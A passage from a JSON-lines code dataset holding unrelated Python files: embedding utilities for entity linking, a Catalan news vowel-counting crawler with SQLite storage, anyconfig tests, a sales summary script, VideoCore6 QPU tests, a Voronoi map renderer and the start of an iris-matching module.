0) if ent2id else i\n arr[index] = equalize_len_w_eot(char_ids, max_char, char_dict['EOT'])\n\n return arr\n\n\ndef decode(arr, char_dict):\n s = ''\n for c_id in arr:\n if c_id:\n s += char_dict[int(c_id)]\n return s\n\n\ndef mse(input, target):\n b = input.shape[0]\n\n return ((input - target) * (input - target)).sum() / b\n\n\ndef get_context_embs(data_path=None, emb_option=None, yamada_model=None, ent_emb_init=None):\n\n num_word, word_dim = yamada_model['word_emb'].shape\n num_ent, ent_dim = yamada_model['ent_emb'].shape\n\n if emb_option == 'random':\n logger.info(f\"Initializing context embs randomly.....\")\n word_embs = normal_initialize(num_word, word_dim)\n ent_embs = normal_initialize(num_ent, ent_dim)\n W = normal_initialize(word_dim, ent_dim)\n b = np.random.randn(ent_dim)\n elif 'w2v' in emb_option:\n logger.info(f\"Loading context embs from {emb_option}.....\")\n ent_embs, word_embs = load_gensim(data_path, model_dir=emb_option, yamada_model=yamada_model)\n W = normal_initialize(word_dim, ent_dim)\n b = np.random.randn(ent_dim)\n elif emb_option == 'yamada':\n logger.info(\"Loading context embs from yamada model.....\")\n ent_embs = yamada_model['ent_emb']\n word_embs = yamada_model['word_emb']\n W = yamada_model['W']\n b = yamada_model['b']\n elif emb_option.endswith('ckpt'):\n logger.info(f\"Loading context embs from ckpt {emb_option}.\")\n state_dict = torch.load(emb_option, map_location=torch.device('cpu'))['state_dict']\n ent_embs = state_dict['ent_embs.weight'].cpu().numpy()\n word_embs = state_dict['word_embs.weight'].cpu().numpy()\n W = state_dict['combine_linear.weight'].cpu().numpy()\n b = state_dict['combine_linear.bias'].cpu().numpy()\n else:\n logger.error(f'init_emb {emb_option} option not recognized, exiting....')\n sys.exit(1)\n\n word_embs[0] = 0\n ent_embs[0] = 0\n\n return word_embs, ent_embs, W, b\n\n\ndef get_mention_embs( emb_option=None, num_word=None, num_ent=None, mention_word_dim=None, mention_ent_dim=None):\n\n if emb_option.endswith('ckpt'):\n logger.info(f\"Loading mention embs from {emb_option}.....\")\n state_dict = torch.load(emb_option, map_location=torch.device('cpu'))['state_dict']\n mention_word_embs = state_dict['mention_word_embs.weight']\n mention_ent_embs = state_dict['mention_ent_embs.weight']\n elif emb_option == 'random':\n mention_word_embs = normal_initialize(num_word, mention_word_dim)\n mention_ent_embs = normal_initialize(num_ent, mention_ent_dim)\n else:\n logger.error(f'init_emb {emb_option} option not recognized, exiting....')\n sys.exit(1)\n\n mention_word_embs[0] = 0\n mention_ent_embs[0] = 0\n\n return mention_word_embs, mention_ent_embs\n\n\ndef load_vocab(vocab_path, max_vocab=-1, plus_one=False):\n d = {}\n with open(vocab_path, 'r') as f:\n for i, line in enumerate(f):\n if i == max_vocab:\n break\n key, id = line.rstrip().split('\\t')\n value = int(id) if int(id) > 0 else -int(id)\n if plus_one:\n value += 1\n d[key] = value\n return d\n\n\ndef pickle_load(path):\n assert os.path.exists(path)\n\n with open(path, 'rb') as f:\n data = pickle.load(f)\n\n return data\n\n\ndef json_load(path):\n assert os.path.exists(path)\n\n with open(path, 'r') as f:\n data = json.load(f)\n\n return data\n\n\ndef pickle_dump(o, path):\n\n with open(path, 'wb') as f:\n pickle.dump(o, f)\n\n\ndef save_checkpoint(state, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n\n\ndef conll_to_wiki(data, rev_word_dict):\n \"\"\"Converts conll data from pershina examples to wikipedia training files to work in combined dataloader.\"\"\"\n res = []\n for words, conll_examples in data:\n word_ids = [rev_word_dict.get(word) for word in words if word in rev_word_dict]\n wiki_examples = [(mention, cands[0]) for mention, cands in conll_examples]\n res.append((word_ids, wiki_examples))\n return res\n\n\ndef load_yamada(path):\n \"\"\"Loads yamada model from ntee and returns dictionary of W, word_embs, ent_embs,\n word_dict, end_dict, W and b\"\"\"\n\n with open(path, 'rb') as f:\n model_dict = pickle.load(f, encoding='bytes')\n\n orig_word_emb = model_dict[b'word_emb']\n num_words, word_dim = orig_word_emb.shape\n orig_word_emb = np.concatenate((np.zeros((1, word_dim)), orig_word_emb), axis=0).astype(np.float32)\n\n orig_ent_emb = model_dict[b'ent_emb']\n orig_ent_emb = np.concatenate((np.zeros((1, word_dim)), orig_ent_emb), axis=0).astype(np.float32)\n orig_ent_emb = normalize(orig_ent_emb)\n\n orig_word_trie = model_dict[b'word_dict']\n orig_ent_trie = model_dict[b'ent_dict']\n orig_b = model_dict[b'b']\n orig_W = model_dict[b'W']\n\n orig_ent_dict = {}\n orig_ent_keys = orig_ent_trie.keys()\n\n for i, k in enumerate(orig_ent_keys):\n k_id = orig_ent_trie.key_id(k)\n k_id += 1\n k = k.replace(' ', '_')\n orig_ent_dict[k] = k_id\n\n orig_word_dict = {}\n orig_word_keys = orig_word_trie.keys()\n\n for i, k in enumerate(orig_word_keys):\n k_id = orig_word_trie.key_id(k)\n k_id += 1\n orig_word_dict[k] = k_id\n\n return {'word_dict': orig_word_dict,\n 'ent_dict': orig_ent_dict,\n 'word_emb': orig_word_emb,\n 'ent_emb': orig_ent_emb,\n 'W': orig_W,\n 'b': orig_b}\n\n\ndef load_stats(args, yamada_model):\n priors = pickle_load(join(args.data_path, \"yamada\", \"ent_priors.pickle\"))\n conditionals = pickle_load(join(args.data_path, \"yamada\", \"ent_conditionals.pickle\"))\n ent2index = pickle_load(join(args.data_path, \"yamada\", \"yamada_ent2index.pickle\"))\n index2ent = reverse_dict(ent2index)\n ent_dict = yamada_model['ent_dict']\n ent_rev = reverse_dict(ent_dict)\n\n ent_priors = {}\n for ent_index, p in priors.items():\n ent_str = index2ent[ent_index]\n if ent_str in ent_dict:\n ent_id = ent_dict[ent_str]\n ent_priors[ent_id] = p\n\n ent_conditionals = {}\n for mention, cond_dict in conditionals.items():\n orig_cond_dict = {}\n for ent_id, p_m in cond_dict.items():\n if ent_id in ent_rev:\n ent_str = ent_rev[ent_id]\n if ent_str in ent_dict:\n orig_ent_id = ent_dict[ent_str]\n orig_cond_dict[orig_ent_id] = p_m\n if len(orig_cond_dict) > 0:\n ent_conditionals[mention] = orig_cond_dict\n\n return priors, conditionals\n\n\ndef load_data(data_type, train_size, data_path, coref=False):\n \"\"\"\n Load train data in format used by combined and yamada dataloader.\n \"\"\"\n res = {}\n splits = ['train', 'dev', 'test']\n if data_type == 'proto':\n logger.info(\"Loading Wikipedia proto training data.....\")\n for split in ['train', 'dev']:\n id2context, examples = pickle_load(join(data_path, 'training_files', 'proto', f'{split}.pickle'))\n if split == 'train':\n examples = examples[:train_size]\n res[split] = id2context, examples\n\n res['test'] = {}, []\n\n elif data_type == 'full':\n logger.info(\"Loading Wikipedia orig training data.....\")\n id2context, examples = pickle_load(join(data_path, 'training_files', 'full', 'full.pickle'))\n\n train_data = []\n dev_data = []\n test_data = []\n for ex in examples:\n if len(train_data) == train_size:\n break\n r = np.random.random()\n if r < 0.90:\n train_data.append(ex)\n\n elif 0.9 < r < 0.95:\n dev_data.append(ex)\n else:\n test_data.append(ex)\n\n res = {'train': (id2context, train_data),\n 'dev': (id2context, dev_data),\n 'test': (id2context, test_data)\n }\n elif data_type == 'conll':\n if coref:\n logger.info(\"Loading conll data from trainning_files/coref....\")\n res['dev'] = pickle_load(join(data_path, 'training_files', 'coref', 'conll-dev.pickle'))\n res['train'] = pickle_load(join(data_path, 'training_files', 'coref', 'conll-train.pickle'))\n res['test'] = []\n else:\n data_dict = pickle_load(join(data_path, 'training_files', f'all_conll.pickle'))\n for split in splits:\n res[split] = data_dict['id2c'], data_dict['data'][split]\n else:\n logger.error(\"Data type {} not recognized\".format(data_type))\n sys.exit(1)\n\n return res\n\n\ndef load_gensim(data_path=None, model_dir=None, yamada_model=None):\n \"\"\"Load model trained with gensim, fill in the ent and word vector matrix and return them.\"\"\"\n word2id = yamada_model['word_dict']\n ent2id = yamada_model['ent_dict']\n\n model = gensim.models.KeyedVectors.load(join(data_path, 'w2v', model_dir, 'model'))\n wv = model.wv\n index2word = wv.index2word\n vectors = wv.vectors\n emb_dim = vectors.shape[1]\n\n ent_indices = [i for i, word in enumerate(index2word) if word.startswith('e__')]\n ent_ids = [int(word[3:]) for i, word in enumerate(index2word) if word.startswith('e__')]\n\n word_indices = [i for i, word in enumerate(index2word) if not word.startswith('e__')]\n words = [word for i, word in enumerate(index2word) if not word.startswith('e__')]\n\n ent_embs = np.zeros((len(ent2id) + 1, emb_dim))\n for ent_index, ent_id in zip(ent_indices, ent_ids):\n ent_embs[ent_id] = vectors[ent_index]\n\n word_embs = np.zeros((len(word2id) + 1, emb_dim))\n for word_index, word in zip(word_indices, words):\n if word in word2id:\n word_id = word2id[word]\n word_embs[word_id] = vectors[word_index]\n\n return ent_embs, word_embs\n","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552390653","text":"#!/usr/bin/env python3\n\nimport sys\nimport signal\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom collections import OrderedDict\nimport datetime\nimport os\nimport sqlite3 as lite\n\nfrom bottle import run\nimport bonus\n\n\nDB = bonus.DB\nvowels = \"aàeèéiíïoòóuúü\" # Catalan vowels (w/ accentuation)\n\n\nclass AraSpider(scrapy.Spider):\n '''\n Class scrapy for task crawler. Scratch all news URL and count\n the number of vowels for each article.\n '''\n name = 'ara'\n allowed_domains = [\"ara.cat\"]\n start_urls = ['http://www.ara.cat/rss/']\n\n def __init__(self, data={}, *args, **kwargs):\n super(AraSpider, self).__init__(*args, **kwargs)\n self.data = data\n\n def parse(self, response):\n for href in response.xpath('//item/link/text()'):\n full_url = href.extract()\n self.data[full_url] = 0\n yield scrapy.Request(full_url, callback=self.parse_vowels)\n \n def parse_vowels(self, response): \n titular = response.css('#heading h1::text').extract()[0].lower()\n subtitular = ''.join(response.css(\n '#heading .pg-bkn-nutfold.txt ::text').extract()).strip().lower()\n body = ''.join(response.css('.mce-body .mce::text').extract()).lower()\n # body xpath('//div[@class=\"mce-body\"]//text()')\n text = ''.join((titular, subtitular, body))\n count_vowels = sum(c in vowels for c in text)\n self.data[response.url] = count_vowels\n\n\ndef persist(data, filename=DB):\n '''\n Bonus1: Persist the results in SQLite3.\n Struct of bd:\n Tablename: Data of the day (i.e., date280320016)\n Items: Id (Autoincrement)\n Web\n Vowels\n Extra: If table exist, update new news.\n '''\n\n table_name = datetime.datetime.utcnow().strftime('date%d%m%Y')\n create = not os.path.exists(filename)\n db = lite.connect(filename)\n cursor = db.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table' and \"\n \"name=?\",(table_name,))\n tables = cursor.fetchall()\n\n if create or len(tables) == 0:\n with db: \n cursor.execute(\"CREATE TABLE \" + table_name + \" (\"\n \"Id INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE NOT NULL, \"\n \"Web TEXT UNIQUE NOT NULL, \"\n \"Vowels INTEGER NOT NULL)\")\n cursor.executemany(\"INSERT INTO \" + table_name + \"(Web,Vowels)\"\n \" VALUES(?, ?)\", data.items())\n return \"Persisted\"\n else:\n with db:\n cursor.executemany(\"INSERT OR IGNORE INTO \" + table_name +\n \"(Web,Vowels) VALUES(?, ?)\", data.items())\n return \"Updated\"\n \n \nif __name__ == \"__main__\":\n \n data = OrderedDict()\n\n # Create and run the crawler object\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'LOG_ENABLED': False,\n 'COOKIES_ENABLED': False,\n })\n process.crawl(AraSpider, data=data)\n process.start()\n\n # Show each resource (key : value) representation\n for k, v in data.items():\n print('{0} : {1}'.format(k, v))\n\n # Bonus1, persist the results in SQLite\n print(\"Data {0} : OK\".format(persist(data)))\n\n # Bonus1/Bonus3 run ReST API server with signal for Ctrl-C\n def signal_handler(signal, frame):\n sys.exit(0)\n\n signal.signal(signal.SIGINT, signal_handler)\n run(host='localhost', port=8080)\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469465194","text":"#\n# Copyright (C) 2012 - 2021 Satoru SATOH \n# SPDX-License-Identifier: MIT\n#\n# pylint: disable=missing-docstring\nimport copy\nimport pathlib\nimport tempfile\nimport unittest\n\nimport anyconfig as TT\n\n\nclass TestCase(unittest.TestCase):\n\n obj = dict(name=\"a\", a=1, b=dict(b=[0, 1], c='C'))\n\n def test_10_dump_and_load(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n obj_path = pathlib.Path(tmpdir) / 'a.json'\n\n TT.dump(self.obj, obj_path)\n self.assertTrue(obj_path.exists())\n\n obj1 = TT.load(obj_path)\n self.assertEqual(self.obj, obj1)\n\n def test_20_dump_and_multi_load(self):\n obj_diff = dict(a=2, b=dict(b=[1, 2, 3, 4, 5], d='D'))\n\n with tempfile.TemporaryDirectory() as tmpdir:\n a_path = pathlib.Path(tmpdir) / 'a.json'\n b_path = pathlib.Path(tmpdir) / 'b.json'\n\n TT.dump(self.obj, a_path)\n self.assertTrue(a_path.exists())\n\n TT.dump(obj_diff, b_path)\n self.assertTrue(b_path.exists())\n\n ref = copy.copy(self.obj)\n obj_1 = TT.multi_load([a_path, b_path], ac_merge=TT.MS_DICTS)\n TT.merge(ref, obj_diff, ac_merge=TT.MS_DICTS)\n self.assertEqual(obj_1, ref)\n\n# vim:sw=4:ts=4:et:\n","sub_path":"tests/mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278627498","text":"\n\n\n\ndef innlesing(filnavn):\n guleSider = {}\n \n with open(filnavn, \"r\") as infile:\n for line in infile.readlines():\n line = line.split()\n\n guleSider[line[0]] = int(line[1])\n\n return guleSider\n\n\ndef maanedensSalgsPerson(ob):\n print(max(ob, key=ob.get), ob[max(ob, key=ob.get)])\n\n\ndef totalAntallSalg(ob):\n counter = 0\n for i in ob:\n counter+= ob[i]\n return counter\n\n\ndef gjennomsnittSalg(ob):\n return totalAntallSalg(ob)/len(ob)\n\n\ndef hovedprogram(filnavn):\n a = innlesing(filnavn)\n print(\"Filnavnet er\", filnavn)\n print(\"Maanedens Salgs Person:\") \n maanedensSalgsPerson(a)\n print(\"Total antall salg:\", totalAntallSalg(a))\n print(\"GjennomsnittSalg: \", gjennomsnittSalg(a))\n print(\"Antall personer lest inn:\", len(a))\n\nhovedprogram(\"salgsliste.txt\")\n\n\n\n\n\n\n\n","sub_path":"oblig6/telefonsalg.py","file_name":"telefonsalg.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512548808","text":"\nimport time\nfrom videocore6.driver import Driver\nfrom videocore6.assembler import qpu\nimport numpy as np\n\n\n@qpu\ndef cost(asm):\n shl(r0, 8, 8)\n shl(r0, r0, 8)\n with loop as l:\n sub(r0, r0, 1, cond = 'pushn')\n l.b(cond = 'anyna')\n nop()\n nop()\n nop()\n\n@qpu\ndef qpu_serial(asm):\n\n nop(sig = ldunifrf(rf0))\n nop(sig = ldunifrf(rf1))\n nop(sig = ldunifrf(rf2))\n nop(sig = ldunifrf(rf3))\n\n eidx(r0)\n shl(r0, r0, 2)\n add(rf2, rf2, r0)\n add(rf3, rf3, r0)\n shl(r3, 4, 4)\n\n for i in range(16):\n mov(tmua, rf2, sig = thrsw).add(rf2, rf2, r3)\n nop()\n nop()\n nop(sig = ldtmu(r0))\n mov(tmud, r0)\n mov(tmua, rf3, sig = thrsw).add(rf3, rf3, r3)\n tmuwt()\n\n cost(asm)\n\n nop(sig = thrsw)\n nop(sig = thrsw)\n nop()\n nop()\n nop(sig = thrsw)\n nop()\n nop()\n nop()\n\n# This code requires 16 thread execution.\n# If # of thread < 16, thread id (= (tidx & 0b111110) >> 1) could be discontiguous.\n# If # of thread > 16, thread id (= (tidx & 0b111110) >> 1) could be duplicated.\n@qpu\ndef qpu_parallel_16(asm):\n\n tidx(r0, sig = ldunifrf(rf0))\n shr(r0, r0, 1).mov(r1, 1)\n shl(r1, r1, 5)\n sub(r1, r1, 1)\n band(rf31, r0, r1) # rf31 = (qpu_id * 2) + (thread_id >> 1)\n\n # rf31 * unif[0,1] * sizeof(float) + (unif.addresses[0,0] + 2 * sizeof(float))\n nop(sig = ldunifrf(rf1)) # rf1 = unif[0,1]\n shl(r0, rf1, 2)\n umul24(r0, r0, rf31)\n add(r1, rf0, 8)\n add(r0, r0, r1)\n eidx(r1)\n shl(r1, r1, 2)\n add(tmua, r0, r1, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0)) # unif[th,2:18]\n mov(r5rep, r0)\n mov(rf2, r5).rotate(r5rep, r0, -1) # rf2 = unif[th,2]\n mov(rf3, r5) # rf3 = unif[th,3]\n\n eidx(r2)\n shl(r2, r2, 2)\n add(tmua, rf2, r2, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(rf32))\n\n eidx(r2)\n shl(r2, r2, 2)\n mov(tmud, rf32)\n add(tmua, rf3, r2)\n tmuwt()\n\n cost(asm)\n\n nop(sig = thrsw)\n nop(sig = thrsw)\n nop()\n nop()\n nop(sig = thrsw)\n nop()\n nop()\n nop()\n\ndef test_parallel_16():\n\n with Driver() as drv:\n\n thread = 16\n\n serial_code = drv.program(qpu_serial)\n parallel_code = drv.program(qpu_parallel_16)\n X = drv.alloc((thread, 16), dtype = 'float32')\n Ys = drv.alloc((thread, 16), dtype = 'float32')\n Yp = drv.alloc((thread, 16), dtype = 'float32')\n unif = drv.alloc((thread, 4), dtype = 'uint32')\n\n X[:] = np.random.randn(*X.shape)\n Ys[:] = -1\n Yp[:] = -1\n\n unif[:,0] = unif.addresses()[:,0]\n unif[:,1] = unif.shape[1]\n unif[:,2] = X.addresses()[:,0]\n unif[:,3] = Ys.addresses()[:,0]\n\n start = time.time()\n drv.execute(serial_code, unif.addresses()[0,0])\n end = time.time()\n serial_cost = end - start\n\n unif[:,3] = Yp.addresses()[:,0]\n\n start = time.time()\n drv.execute(parallel_code, unif.addresses()[0,0], thread=thread)\n end = time.time()\n parallel_cost = end - start\n\n np.set_printoptions(threshold=np.inf)\n\n assert (X == Ys).all()\n assert (X == Yp).all()\n assert parallel_cost < serial_cost * 2\n\n# If remove `barrierid` in this code, `test_barrier` will fail.\n@qpu\ndef qpu_barrier(asm):\n\n tidx(r0, sig = ldunifrf(rf0)) # rf0 = unif[0,0]\n shr(r2, r0, 2)\n band(r1, r0, 0b11) # thread_id\n band(r2, r2, 0b1111) # qpu_id\n shr(r1, r1, 1)\n shl(r2, r2, 1)\n add(rf31, r1, r2) # rf31 = (qpu_id * 2) + (thread_id >> 1)\n\n nop(sig = ldunifrf(rf1)) # rf1 = unif[0,1]\n\n # rf31 * unif[0,1] * sizeof(float) + (unif.addresses[0,0] + 2 * sizeof(float))\n shl(r0, rf1, 2)\n umul24(r0, r0, rf31)\n add(r1, rf0, 8)\n add(r0, r0, r1)\n eidx(r1)\n shl(r1, r1, 2)\n add(tmua, r0, r1, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0)) # unif[th,2:18]\n mov(r5rep, r0)\n mov(rf2, r5).rotate(r5rep, r0, -1) # rf2 = unif[th,2]\n mov(rf3, r5) # rf3 = unif[th,3]\n\n eidx(r2)\n shl(r2, r2, 2)\n add(tmua, rf2, r2, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0))\n\n mov(r1, rf31)\n shl(r1, r1, 8)\n L.loop\n sub(r1, r1, 1, cond = 'pushn')\n b(R.loop, cond = 'anyna')\n nop()\n nop()\n nop()\n\n eidx(r2)\n shl(r2, r2, 2)\n mov(tmud, r0)\n add(tmua, rf3, r2)\n tmuwt()\n\n barrierid(syncb, sig = thrsw)\n\n add(rf32, rf31, 1)\n band(rf32, rf32, 0b1111) # rf32 = (rf31 + 1) mod 16\n\n # rf32 * unif[0,1] * sizeof(float) + (unif.addresses[0,0] + 2 * sizeof(float))\n shl(r0, rf1, 2)\n umul24(r0, r0, rf32)\n add(r1, rf0, 8)\n add(r0, r0, r1)\n eidx(r1)\n shl(r1, r1, 2)\n add(tmua, r0, r1, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0)) # unif[(th+1)%16,2:18]\n mov(r5rep, r0)\n mov(rf4, r5).rotate(r5rep, r0, -1) # rf4 = unif[(th+1)%16,2]\n mov(rf5, r5) # rf5 = unif[(th+1)%16,3]\n\n eidx(r2)\n shl(r2, r2, 2)\n add(tmua, rf5, r2, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0))\n\n eidx(r2)\n shl(r2, r2, 2)\n mov(tmud, r0)\n add(tmua, rf3, r2)\n tmuwt()\n\n nop(sig = thrsw)\n nop(sig = thrsw)\n nop()\n nop()\n nop(sig = thrsw)\n nop()\n nop()\n nop()\n\ndef test_barrier():\n\n with Driver() as drv:\n\n thread = 16\n\n code = drv.program(qpu_barrier)\n X = drv.alloc((thread, 16), dtype = 'float32')\n Y = drv.alloc((thread, 16), dtype = 'float32')\n unif = drv.alloc((thread, 4), dtype = 'uint32')\n\n X[:] = np.random.randn(*X.shape)\n Y[:] = -1\n\n unif[:,0] = unif.addresses()[:,0]\n unif[:,1] = unif.shape[1]\n unif[:,2] = X.addresses()[:,0]\n unif[:,3] = Y.addresses()[:,0]\n\n start = time.time()\n drv.execute(code, unif.addresses()[0,0], thread=thread)\n end = time.time()\n\n np.set_printoptions(threshold=np.inf)\n\n assert (Y == np.concatenate([X[1:],X[:1]])).all()\n","sub_path":"tests/test_parallel.py","file_name":"test_parallel.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"204489144","text":"from numpy import *\r\nfrom matplotlib import pyplot as plt\r\nfrom delaunay_generation import main_delaunay_generation as delaunay_gen\r\nimport pickle\r\nfrom matplotlib.path import Path\r\nimport matplotlib.patches as patches\r\nfrom getcolorclass import *\r\n\r\n#####################################################################################\r\n#### delaunay structure : #################################\r\n#### delaunay.Liste #################################\r\n#### delaunay.rand_pts #################################\r\n#### #################################\r\n#### delaunay.Liste[i].indice #################################\r\n#### delaunay.Liste[i].Tri[j] #################################\r\n#### delaunay.Liste[i].Bary[j] #################################\r\n#### #################################\r\n#### delaunay.Liste[i].water #################################\r\n#### delaunay.Liste[i].moisture #################################\r\n#### delaunay.Liste[i].altitude #################################\r\n#### #################################\r\n#### delaunay.Liste[i].Bary[j].pos #################################\r\n#### delaunay.Liste[i].Bary[j].water #################################\r\n#### delaunay.Liste[i].Bary[j].altitude #################################\r\n#### delaunay.Liste[i].Bary[j].moisture #################################\r\n#### delaunay.Liste[i].Bary[j].tri #################################\r\n#####################################################################################\r\n\r\ndef main_voronoi() :\r\n\r\n size_grid = 15\r\n density = 1\r\n grid_step = 1\r\n affichage = 'Polygone'\r\n\r\n delaunay = delaunay_gen(size_grid, density, grid_step)\r\n## return delaunay\r\n\r\n ## gcfm = GetColorFromMap(size_grid)\r\n## if affichage == 'Polygone' or affichage == 'Polygone2':\r\n gcfm = GetColorFromMap(size_grid)\r\n\r\n ####plt.figure()\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n if 1 :\r\n for delau_point in delaunay.Liste :\r\n if affichage == 'Point' :\r\n print(\"point\")\r\n x = empty(0)\r\n y = empty(0)\r\n for bary in delau_point.Bary :\r\n x = hstack((x,bary.Pos[0][0]))\r\n y = hstack((y,bary.Pos[0][1]))\r\n try :\r\n x = hstack((x,x[0]))\r\n y = hstack((y,y[0]))\r\n ax.plot(x,y)\r\n except :\r\n print('x = %s, y = %s' %(x,y))\r\n\r\n\r\n\r\n elif affichage == 'Polygone' :\r\n nverts = len(delau_point.Bary)+1\r\n verts = empty((0,2))\r\n for bary in delau_point.Bary :\r\n verts = vstack((verts,bary.Pos))\r\n try :\r\n## if 1 :\r\n verts = vstack((verts,verts[0,:]))\r\n verts[verts[:,0]<=0,0] = 0\r\n verts[verts[:,1]<=0,1] = 0\r\n verts[verts[:,0]>size_grid,0] = size_grid\r\n verts[verts[:,1]>size_grid,1] = size_grid\r\n codes = ones(nverts, int) * Path.LINETO\r\n codes[0] = Path.MOVETO\r\n codes[nverts-1] = Path.CLOSEPOLY\r\n path = Path(verts, codes)\r\n ind = delau_point.indice\r\n arg_color = delaunay.rand_pts[ind]\r\n if arg_color[0]<0 : arg_color[0] = 0\r\n if arg_color[1]<0 : arg_color[1] = 0\r\n color = gcfm.get_color(arg_color)\r\n patch = patches.PathPatch(path, facecolor=color, edgecolor='none')\r\n ax.add_patch(patch)\r\n except :\r\n print('!!!!!!!!!! attention !!!!!!!!!!! \\n poly_position= %s' %verts)\r\n\r\n\r\n\r\n\r\n elif affichage == 'Polygone2' :\r\n\r\n point_water_array = empty((0,2))\r\n for point in delaunay.Liste :\r\n arg_color = delaunay.rand_pts[point.indice]\r\n if arg_color[0]<0 :\r\n arg_color[0] = 0\r\n if arg_color[1]<0 :\r\n arg_color[1] = 0\r\n\r\n # define water of point\r\n point.water = gcfm.iswater(arg_color)\r\n## print('water : ' + str(point.water))\r\n if point.water == 0 :\r\n point_water_array = vstack((point_water_array,arg_color))\r\n\r\n for point in delaunay.Liste :\r\n for bary in point.Bary :\r\n if bary.pos[0][0] < 0 : bary.pos[0][0] = 0\r\n if bary.pos[0][1] < 0 : bary.pos[0][1] = 0\r\n if bary.pos[0][0] > size_grid : bary.pos[0][0] = size_grid\r\n if bary.pos[0][1] > size_grid : bary.pos[0][1] = size_grid\r\n\r\n dist_from_ocean = sqrt(amin((point_water_array[:,0]-bary.pos[0][0])**2 + \\\r\n (point_water_array[:,1]-bary.pos[0][1])**2))\r\n bary.altitude = dist_from_ocean\r\n\r\n\r\n delaunay, max_altitude = norm_altitude(delaunay)\r\n show_polygones(delaunay, size_grid, gcfm)\r\n\r\n plt.xlim([0,size_grid])\r\n plt.ylim([0,size_grid])\r\n plt.show()\r\n\r\n plt.pause(60)\r\n fichier_nom = (\"fichier_delaunay%sx%s.txt\" %(size_grid, size_grid))\r\n mon_fichier = open(fichier_nom, \"w\")\r\n with open('donnees', 'wb') as fichier:\r\n mon_pickler = pickle.Pickler(fichier)\r\n mon_pickler.dump(delaunay)\r\n\r\n ##\r\n ##with open('donnees', 'rb') as fichier:\r\n ## mon_depickler = pickle.Unpickler(fichier)\r\n ## data = mon_depickler.load()\r\n\r\n\r\n\r\n\r\ndef show_polygones(delaunay, size_grid, gcfm) :\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n for point in delaunay.Liste :\r\n nverts = len(point.Bary)+1\r\n verts = empty((0,2))\r\n for bary in point.Bary :\r\n verts = vstack((verts,bary.pos))\r\n try :\r\n## if 1 :\r\n verts = vstack((verts,verts[0,:]))\r\n\r\n # modifie point hors zone\r\n verts[verts[:,0]<=0,0] = 0\r\n verts[verts[:,1]<=0,1] = 0\r\n verts[verts[:,0]>size_grid,0] = size_grid\r\n verts[verts[:,1]>size_grid,1] = size_grid\r\n\r\n # definition du polygone\r\n codes = ones(nverts, int) * Path.LINETO\r\n codes[0] = Path.MOVETO\r\n codes[nverts-1] = Path.CLOSEPOLY\r\n path = Path(verts, codes)\r\n\r\n couleur = gcfm.get_color2(point)\r\n\r\n # plot\r\n patch = patches.PathPatch(path, facecolor=couleur, edgecolor='none')\r\n ax.add_patch(patch)\r\n except :\r\n print('!!!!!!!!!! attention !!!!!!!!!!! \\n poly_position= %s' %verts)\r\n plt.show()\r\n\r\n\r\ndef norm_altitude(delaunay) :\r\n max_altitude = 0\r\n for point in delaunay.Liste :\r\n for bary in point.Bary :\r\n if bary.altitude > max_altitude :\r\n max_altitude = bary.altitude\r\n for point in delaunay.Liste :\r\n for bary in point.Bary :\r\n bary.altitude = bary.altitude/(max_altitude)\r\n## print(bary.altitude)\r\n return delaunay, max_altitude\r\n\r\n\r\n\r\nif __name__ == '__main__' :\r\n delaunay = main_voronoi()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"DelaunayMappGeneration/voronoi_generation.py","file_name":"voronoi_generation.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155793014","text":"import os\nimport cv2 as cv\nimport numpy as np\nfrom tqdm import tqdm\nfrom time import time\nimport pickle\nfrom itertools import combinations, repeat\nfrom sklearn.preprocessing import LabelBinarizer\nfrom multiprocessing import Pool, cpu_count\n\nfrom fnc.encode import encode\n\n# --------------------------------------------------------------------------\n# Parameters\n# --------------------------------------------------------------------------\nDATA_PATH = '/home/dl/wangleyuan/dataset/CASIA-Iris-Thousand'\nLESS_FLAG = False\n# DATA_PATH = 'E:/Dataset/CASIA-Iris-Lamp'\n# LESS_FLAG = True\nTEMP_DIR = './feature/'\n\n# Feature encoding parameters\nminWaveLength = 18\nmult = 1\nsigmaOnf = 0.5\n\n\n##-----------------------------------------------------------------------------\n## Function\n##-----------------------------------------------------------------------------\ndef calHammingDist(template1, template2):\n # Initialize\n hd = np.nan\n\n # Shift template left and right, use the lowest Hamming distance\n for shifts in range(-8, 9):\n template1s = shiftbits(template1, shifts)\n\n totalbits = template1s.size\n\n hd1 = np.logical_xor(template1s, template2).sum() / template1s.size\n\n if hd1 < hd or np.isnan(hd):\n hd = hd1\n\n return hd\n\n\ndef shiftbits(template, noshifts):\n # Initialize\n templatenew = np.zeros(template.shape)\n width = template.shape[1]\n s = 2 * 